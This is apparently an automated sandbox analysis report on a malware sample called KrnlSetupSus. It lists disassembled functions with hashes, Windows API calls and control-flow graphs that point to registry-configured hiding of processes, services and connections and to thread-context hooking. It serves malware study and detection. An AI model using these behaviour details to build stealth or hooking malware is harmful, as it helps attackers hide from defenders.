                                                                                                                                  • Instruction ID: a3a523b91a2f2e7ba5d3dfaf4f15b835bf58f0f5b5f268b9d86fd5ceaa63d4b1
                                                                                                                                  • Opcode Fuzzy Hash: 8fff3ed98fbdedef6c13e57d98af9ea7fc8e133c68cb3134a04c8e00e25e0472
                                                                                                                                  • Instruction Fuzzy Hash: 1E1181366147A286E324CF26AC8062AB7A4F394FD4F554529DE9653F24DF38D456CB00
                                                                                                                                  Function 1C562B6C Relevance: 3.1, APIs: 2, Instructions: 64nativeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: EnumerateValue
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1749906896-0
                                                                                                                                  • Opcode ID: cce93084de4f1c13faca434b1b58a320d42ce6f8b5b46e4938d1791c75797ad0
                                                                                                                                  • Instruction ID: 864ac7aa2548908a4cdfa861fddbfcef0f04d6f7d17e6a3f9727341107add007
                                                                                                                                  • Opcode Fuzzy Hash: cce93084de4f1c13faca434b1b58a320d42ce6f8b5b46e4938d1791c75797ad0
                                                                                                                                  • Instruction Fuzzy Hash: 0011AC3671476196E324CF17A840A1AB7A4F794FD4F504129DE9A43B24DF34D486CB10
                                                                                                                                  Function 00007FFB4ADF1709 Relevance: 2.1, Strings: 1, Instructions: 880COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2857611419.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_7ffb4adf0000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: CAN_^
                                                                                                                                  • API String ID: 0-3098826533
                                                                                                                                  • Opcode ID: 4c5f153aad4fb02e92945981bcfb2391e514cac65ed209d4ce097b75bf9fd418
                                                                                                                                  • Instruction ID: 3c238b596335728ebce0e350481f8e73e308d33963a0a2eaf1b7a9b8cd9c9722
                                                                                                                                  • Opcode Fuzzy Hash: 4c5f153aad4fb02e92945981bcfb2391e514cac65ed209d4ce097b75bf9fd418
                                                                                                                                  • Instruction Fuzzy Hash: C452A2A1B2DA4A8FE799FF38C4557B977D6EF98300F5405B9F44EC3286DE28A8418341
                                                                                                                                  Function 00007FFB4ADF7B41 Relevance: 1.9, APIs: 1, Instructions: 388COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2857611419.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_7ffb4adf0000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CheckDebuggerPresentRemote
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3662101638-0
                                                                                                                                  • Opcode ID: 7599f042075def0b232d1e3edb7c6410ec217bdb101fe935e3308fff1fbdde53
                                                                                                                                  • Instruction ID: b32fb0186195357371d85fa40995d76f571d59281f3157ef222104eb8564115a
                                                                                                                                  • Opcode Fuzzy Hash: 7599f042075def0b232d1e3edb7c6410ec217bdb101fe935e3308fff1fbdde53
                                                                                                                                  • Instruction Fuzzy Hash: F9C1C1B090CA8D8FDB55EF28C8457E97BE0FF59311F1442AAE84DC7192DB389845CB91
                                                                                                                                  Function 00007FFB4ADFD125 Relevance: .9, Instructions: 922COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2857611419.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_7ffb4adf0000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 092dd542882d00a3b5ab6d66794cdeeb1afda97cd2488463a34fda4934560b5e
                                                                                                                                  • Instruction ID: 9555cdcb09a4555a01908c212ea74fb65f34d906d7a76d224c2d1d1494ac5b5c
                                                                                                                                  • Opcode Fuzzy Hash: 092dd542882d00a3b5ab6d66794cdeeb1afda97cd2488463a34fda4934560b5e
                                                                                                                                  • Instruction Fuzzy Hash: 1A424CB1A0DA4D4FE759AF78D8056BA7BE4EF56310F1401BFE08AC3193DE299806C791
                                                                                                                                  Function 00007FFB4ADF6596 Relevance: .5, Instructions: 469COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2857611419.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_7ffb4adf0000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e0a5159a711ab3b9f6a296b7c09518060cf00819a37accf0363050dd5087fc11
                                                                                                                                  • Instruction ID: a4a60d66e9b6a061c73d7ad74012d462bf6d5495dbc5d5bc7373cf5fa2616dd7
                                                                                                                                  • Opcode Fuzzy Hash: e0a5159a711ab3b9f6a296b7c09518060cf00819a37accf0363050dd5087fc11
                                                                                                                                  • Instruction Fuzzy Hash: 2DF1827060CA8D8FEBA8EF28C8557E937E1FF58310F1442AEE84DC7691DB3499458B81
                                                                                                                                  Function 00007FFB4ADF7342 Relevance: .5, Instructions: 458COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2857611419.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_7ffb4adf0000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: dba1c34200ea526d59a05e3a5b258caa7b55786ddb89e07e569455e2be172609
                                                                                                                                  • Instruction ID: f247795d0c52a86a7f91079c54b120f3df919a043b7d262493042073238c4908
                                                                                                                                  • Opcode Fuzzy Hash: dba1c34200ea526d59a05e3a5b258caa7b55786ddb89e07e569455e2be172609
                                                                                                                                  • Instruction Fuzzy Hash: 03E1B5B0A0CA4E8FEBA8EF28C8557E977D1FF54310F1442AEE84DC7691DE7498458B81
                                                                                                                                  Function 00007FFB4ADF2461 Relevance: .4, Instructions: 385COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2857611419.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_7ffb4adf0000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9bb8ab6c1ce0d048e9c35afcca0a59483839b4ed08636f526708c474ff7efb61
                                                                                                                                  • Instruction ID: 6ad9d5a8e635e9d0f45fc13627f7ebc90aa1551c97c4d5a96f91bade553dfc05
                                                                                                                                  • Opcode Fuzzy Hash: 9bb8ab6c1ce0d048e9c35afcca0a59483839b4ed08636f526708c474ff7efb61
                                                                                                                                  • Instruction Fuzzy Hash: 44C1B7B1B1CA494FE799FF38C4662BA77D6EF98300F1445B9E44EC72D2DE28A8024741
                                                                                                                                  Function 00007FFB4ADF21C1 Relevance: .2, Instructions: 205COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2857611419.00007FFB4ADF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4ADF0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_7ffb4adf0000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 468df23fce0430ae0f6e23fb8f9f01f2b9db2f633cd09a030c3bc78a8eccdceb
                                                                                                                                  • Instruction ID: f3c081df90f3495ccdd107e8e193734ebe5794b3213093e4996cb3fccdaa5a4e
                                                                                                                                  • Opcode Fuzzy Hash: 468df23fce0430ae0f6e23fb8f9f01f2b9db2f633cd09a030c3bc78a8eccdceb
                                                                                                                                  • Instruction Fuzzy Hash: 15510190A1E6C64FE796AF7898652767FD8EF87215B1804FEE0C9CB193DD085846C342
                                                                                                                                  Function 1C561724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  APIs
                                                                                                                                  • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56172F
                                                                                                                                  • HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56173E
                                                                                                                                    • Part of subcall function 1C561264: GetProcessHeap.KERNEL32(?,?,00000000,1C56174C,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56126A
                                                                                                                                    • Part of subcall function 1C561264: HeapAlloc.KERNEL32(?,?,00000000,1C56174C,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561279
                                                                                                                                    • Part of subcall function 1C561264: GetProcessHeap.KERNEL32(?,?,00000000,1C56174C,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561293
                                                                                                                                    • Part of subcall function 1C561264: HeapAlloc.KERNEL32(?,?,00000000,1C56174C,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C5612A4
                                                                                                                                    • Part of subcall function 1C561000: GetProcessHeap.KERNEL32(?,?,00000000,1C561754,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561006
                                                                                                                                    • Part of subcall function 1C561000: HeapAlloc.KERNEL32(?,?,00000000,1C561754,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561015
                                                                                                                                    • Part of subcall function 1C561000: GetProcessHeap.KERNEL32(?,?,00000000,1C561754,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561028
                                                                                                                                    • Part of subcall function 1C561000: HeapAlloc.KERNEL32(?,?,00000000,1C561754,?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561037
                                                                                                                                  • RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C5617AE
                                                                                                                                  • RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C5617DB
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C5617F5
                                                                                                                                  • RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561815
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561830
                                                                                                                                  • RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561850
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56186B
                                                                                                                                  • RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56188B
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C5618A6
                                                                                                                                  • RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C5618C6
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C5618E1
                                                                                                                                  • RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561901
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56191C
                                                                                                                                  • RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56193C
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561957
                                                                                                                                  • RegOpenKeyExW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561977
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C561992
                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,1C561BCF), ref: 1C56199C
                                                                                                                                    • Part of subcall function 1C5612B8: RegQueryInfoKeyW.ADVAPI32 ref: 1C561315
                                                                                                                                    • Part of subcall function 1C5612B8: GetProcessHeap.KERNEL32 ref: 1C561323
                                                                                                                                    • Part of subcall function 1C5612B8: HeapAlloc.KERNEL32 ref: 1C561334
                                                                                                                                    • Part of subcall function 1C5612B8: RegEnumValueW.ADVAPI32 ref: 1C561393
                                                                                                                                    • Part of subcall function 1C5612B8: GetProcessHeap.KERNEL32 ref: 1C5613DB
                                                                                                                                    • Part of subcall function 1C5612B8: HeapAlloc.KERNEL32 ref: 1C5613E9
                                                                                                                                    • Part of subcall function 1C5612B8: GetProcessHeap.KERNEL32 ref: 1C561406
                                                                                                                                    • Part of subcall function 1C5612B8: HeapFree.KERNEL32 ref: 1C561414
                                                                                                                                    • Part of subcall function 1C5612B8: lstrlenW.KERNEL32 ref: 1C56141D
                                                                                                                                    • Part of subcall function 1C5612B8: GetProcessHeap.KERNEL32 ref: 1C56142B
                                                                                                                                    • Part of subcall function 1C5612B8: HeapAlloc.KERNEL32 ref: 1C561439
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                                  • String ID: SOFTWARE\$77config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                  • API String ID: 2135414181-649645306
                                                                                                                                  • Opcode ID: 445862cced0eeb427bf2935d681c487e1122b3e99838d7c9d0eb6bf393a45dcf
                                                                                                                                  • Instruction ID: 18c128d4fa517d4438afbd4fa3af6971c3d4bd25465ceb709807e43aa3f3aafe
                                                                                                                                  • Opcode Fuzzy Hash: 445862cced0eeb427bf2935d681c487e1122b3e99838d7c9d0eb6bf393a45dcf
                                                                                                                                  • Instruction Fuzzy Hash: D571B736710FA1C6EB109F66E894B993375FB88B9CF805111DE8E57B28EE38D488C754
                                                                                                                                  Function 1C563C98 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 164 1c563c98-1c563cb2 GetModuleHandleW 165 1c563d3d-1c563d49 164->165 166 1c563cb8-1c563cc8 164->166 167 1c563cd4-1c563cfe GetCurrentProcess VirtualProtectEx 166->167 168 1c563cca-1c563cd2 166->168 167->165 169 1c563d00-1c563d38 GetCurrentProcess VirtualProtectEx 167->169 168->165 168->167 169->165
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNEL32(?,?,?,?,?,1C56382B), ref: 1C563CA6
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,1C56382B), ref: 1C563CD4
                                                                                                                                  • VirtualProtectEx.KERNEL32(?,?,?,?,?,1C56382B), ref: 1C563CF6
                                                                                                                                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,1C56382B), ref: 1C563D11
                                                                                                                                  • VirtualProtectEx.KERNEL32(?,?,?,?,?,1C56382B), ref: 1C563D32
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                                                                                  • String ID: wr
                                                                                                                                  • API String ID: 1092925422-2678910430
                                                                                                                                  • Opcode ID: 570c46f7119da87072e243a34acf534bc10630e2aaaf80423ed29c95a4165983
                                                                                                                                  • Instruction ID: 7b0a602a0a9b1da2aac2fc0453f51ab05c4e2cf0d49c30efd99610a045766748
                                                                                                                                  • Opcode Fuzzy Hash: 570c46f7119da87072e243a34acf534bc10630e2aaaf80423ed29c95a4165983
                                                                                                                                  • Instruction Fuzzy Hash: 8B015B3A305B9082FB149B21E4087A97362FB89B98F850429DE8E07B55EF3DC585C710
                                                                                                                                  Function 1C566030 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 170 1c566030-1c566057 171 1c56606b-1c566076 GetCurrentThreadId 170->171 172 1c566059-1c566068 170->172 173 1c566082-1c566089 171->173 174 1c566078-1c56607d 171->174 172->171 176 1c56609b-1c5660af 173->176 177 1c56608b-1c566096 call 1c565e60 173->177 175 1c5664af-1c5664c6 call 1c567e30 174->175 180 1c5660be-1c5660c4 176->180 177->175 181 1c566195-1c5661b6 180->181 182 1c5660ca-1c5660d3 180->182 190 1c56631f-1c566330 call 1c5679bf 181->190 191 1c5661bc-1c5661dc GetThreadContext 181->191 185 1c5660d5-1c566118 call 1c573800 182->185 186 1c56611a-1c56618d call 1c564a10 call 1c5649b0 call 1c564970 182->186 199 1c566190 185->199 186->199 202 1c566335-1c56633b 190->202 195 1c5661e2-1c566203 191->195 196 1c56631a 191->196 195->196 201 1c566209-1c566212 195->201 196->190 199->180 205 1c566214-1c566225 201->205 206 1c566292-1c5662a3 201->206 207 1c566341-1c566398 VirtualProtect FlushInstructionCache 202->207 208 1c5663fe-1c56640e 202->208 210 1c566227-1c56623c 205->210 211 1c56628d 205->211 214 1c566315 206->214 215 1c5662a5-1c5662c3 206->215 212 1c56639a-1c5663a4 207->212 213 1c5663c9-1c5663f9 call 1c567d9c 207->213 217 1c566410-1c566417 208->217 218 1c56641e-1c56642a call 1c5652f0 208->218 210->211 220 1c56623e-1c566288 call 1c563e70 SetThreadContext 210->220 211->214 212->213 221 1c5663a6-1c5663c1 call 1c564890 212->221 213->202 215->214 222 1c5662c5-1c566310 call 1c563e00 call 1c5679dd 215->222 217->218 224 1c566419 call 1c5648e0 217->224 231 1c56642f-1c566435 218->231 220->211 221->213 222->214 224->218 235 1c566477-1c566495 231->235 236 1c566437-1c566475 ResumeThread call 1c567d9c 231->236 239 1c566497-1c5664a6 235->239 240 1c5664a9 235->240 236->231 239->240 240->175
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 1C56606B
                                                                                                                                  • GetThreadContext.KERNEL32 ref: 1C5661D5
                                                                                                                                    • Part of subcall function 1C565E60: GetCurrentThreadId.KERNEL32 ref: 1C565E64
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Thread$Current$Context
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1666949209-0
                                                                                                                                  • Opcode ID: 4b29ed86d741421b850d54b87c4813ebf18c4615bae11fb1badaae565402ad19
                                                                                                                                  • Instruction ID: 35d070fdb600db1d8e5e4411e2a037eb6da06fed9a2cf4d07566e08201e1b065
                                                                                                                                  • Opcode Fuzzy Hash: 4b29ed86d741421b850d54b87c4813ebf18c4615bae11fb1badaae565402ad19
                                                                                                                                  • Instruction Fuzzy Hash: FCC1A776209F98C2DB60CB16E49035AB7A1F7C8B89F100616EACD47B68DF3CD585CB24
                                                                                                                                  Function 1C561AD0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30stringCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 242 1c561ad0-1c561af8 GetFinalPathNameByHandleW 243 1c561afa-1c561b12 StrCmpNIW 242->243 244 1c561b39-1c561b4b 242->244 243->244 245 1c561b14-1c561b24 lstrlenW 243->245 245->244 246 1c561b26-1c561b34 StrCpyW 245->246 246->244
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841304277.000000001C582000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2841623908.000000001C589000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_3_2_1c560000_KrnlSetupSus.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FinalHandleNamePathlstrlen
                                                                                                                                  • String ID: \\?\
                                                                                                                                  • API String ID: 2719912262-4282027825
                                                                                                                                  • Opcode ID: 8ec5aa73b904ba0ae152e0023bf61817b040c34d1fdb6eca25b3f21a7418f015
                                                                                                                                  • Instruction ID: b80881e4d4410e6ad6be45f7ddb002afc08451a11bad4a298b7c5b79ce8a5b85
                                                                                                                                  • Opcode Fuzzy Hash: 8ec5aa73b904ba0ae152e0023bf61817b040c34d1fdb6eca25b3f21a7418f015
                                                                                                                                  • Instruction Fuzzy Hash: 0EF0FF72314B8592F7208F65F994B9A7321F744B98FC44024DA4946974DF6CD6DDCB10
                                                                                                                                  Function 1C5655D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                                                                                  Download Yara Rule

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 247 1c5655d0-1c5655fc 248 1c5655fe-1c565606 247->248 249 1c56560d-1c565616 247->249 248->249 250 1c565627-1c565630 249->250 251 1c565618-1c565620 249->251 252 1c565632-1c56563a 250->252 253 1c565641-1c56564a 250->253 251->250 252->253 254 1c565656-1c565661 GetCurrentThreadId 253->254 255 1c56564c-1c565651 253->255 257 1c565663-1c565668 254->257 258 1c56566d-1c565674 254->258 256 1c565bd3-1c565bda 255->256 257->256 259 1c565676-1c56567c 258->259 260 1c565681-1c56568a 258->260 259->256 261 1c565696-1c5656a2 260->261 262 1c56568c-1c565691 260->262 263 1c5656a4-1c5656c9 261->263 264 1c5656ce-1c565725 call 1c565be0 * 2 261->264 262->256 263->256 269 1c565727-1c56572e 264->269 270 1c56573a-1c565743 264->270 271 1c565736 269->271 272 1c565730 269->272 273 1c565755-1c56575e 270->273 274 1c565745-1c565752 270->274 276 1c5657a6-1c5657aa 271->276 275 1c5657b0-1c5657b6 272->275 277 1c565773-1c565798 call 1c567d60 273->277 278 1c565760-1c565770 273->278 274->273 279 1c5657e5-1c5657eb 275->279 280 1c5657b8-1c5657d4 call 1c564890 275->280 276->275 286 1c56579e 277->286 287 1c56582d-1c565842 call 1c5641c0 277->287 278->277 283 1c565815-1c565828 279->283 284 1c5657ed-1c56580c call 1c567d9c 279->284 280->279 290 1c5657d6-1c5657de 280->290 283->256 284->283 286->276 294 1c565844-1c56584c 287->294 295 1c565851-1c56585a 287->295 290->279 294->276 296 1c56586c-1c5658ba call 1c573ea0 295->296 297 1c56585c-1c565869 295->297 300 1c5658c2-1c5658ca 296->300 297->296 301 1c5659d7-1c5659df 300->301 302 1c5658d0-1c5659bb call 1c567940 300->302 303 1c565a23-1c565a2b 301->303 304 1c5659e1-1c5659f4 call 1c564a90 301->304 314 1c5659bf-1c5659ce call 1c564560 302->314 315 1c5659bd 302->315 307 1c565a37-1c565a46 303->307 308 1c565a2d-1c565a35 303->308 316 1c5659f6 304->316 317 1c5659f8-1c565a21 304->317 312 1c565a4f 307->312 313 1c565a48 307->313 308->307 311 1c565a54-1c565a61 308->311 319 1c565a64-1c565ab9 call 1c573800 311->319 320 1c565a63 311->320 312->311 313->312 324 1c5659d2 314->324 325 1c5659d0 314->325 315->301 316->303 317->301 326 1c565abb-1c565ac3 319->326 327 1c565ac8-1c565b61 call 1c564a10 call 1c564970 VirtualProtect 319->327 320->319 324->300 325->301 332 1c565b63-1c565b68 GetLastError 327->332 333 1c565b71-1c565bd1 327->333 332->333 333->256
                                                                                                                                  APIs
                                                                                                                                  • GetCurrentThreadId.KERNEL32 ref: 1C565656
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000003.00000002.2839853454.000000001C561000.00000020.00001000.00020000.00000000.sdmp, Offset: 1C560000, based on PE: true
                                                                                                                                  • Associated: 00000003.00000002.2839611755.000000001C560000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840560546.000000001C575000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 00000003.00000002.2840981653.000000001C580000.00000004.00001000.00020000.00000000.sdmpDownload File
